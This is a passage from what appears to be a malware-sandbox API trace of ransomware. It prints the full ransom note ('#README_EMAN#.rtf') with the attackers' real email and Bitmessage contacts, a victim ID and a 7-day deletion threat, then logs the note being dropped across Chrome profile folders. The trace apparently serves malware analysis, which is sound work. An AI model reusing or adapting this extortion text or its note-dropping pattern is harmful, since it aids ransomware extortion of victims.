br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.338] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.339] CloseHandle (hObject=0x294) returned 1 [0285.339] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#readme_eman#.rtf")) returned 0xffffffff [0285.339] GetLastError () returned 0x2 [0285.339] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.340] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.340] CloseHandle (hObject=0x294) returned 1 [0285.341] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\#readme_eman#.rtf")) returned 0xffffffff [0285.341] GetLastError () returned 0x2 [0285.341] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.341] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.342] CloseHandle (hObject=0x294) returned 1 [0285.342] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\#readme_eman#.rtf")) returned 0xffffffff [0285.342] GetLastError () returned 0x2 [0285.342] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.343] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.343] CloseHandle (hObject=0x294) returned 1 [0285.343] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#readme_eman#.rtf")) returned 0xffffffff [0285.343] GetLastError () returned 0x2 [0285.343] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.344] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.345] CloseHandle (hObject=0x294) returned 1 [0285.345] Sleep (dwMilliseconds=0x3e8) [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 1 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 1 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 3 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount2=134) returned 3 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount2=134) returned 1 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount2=130) returned 3 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount2=130) returned 1 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0286.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0286.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0286.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0286.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount2=137) returned 1 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount2=137) returned 3 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount2=137) returned 1 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount2=131) returned 3 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount2=131) returned 3 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, 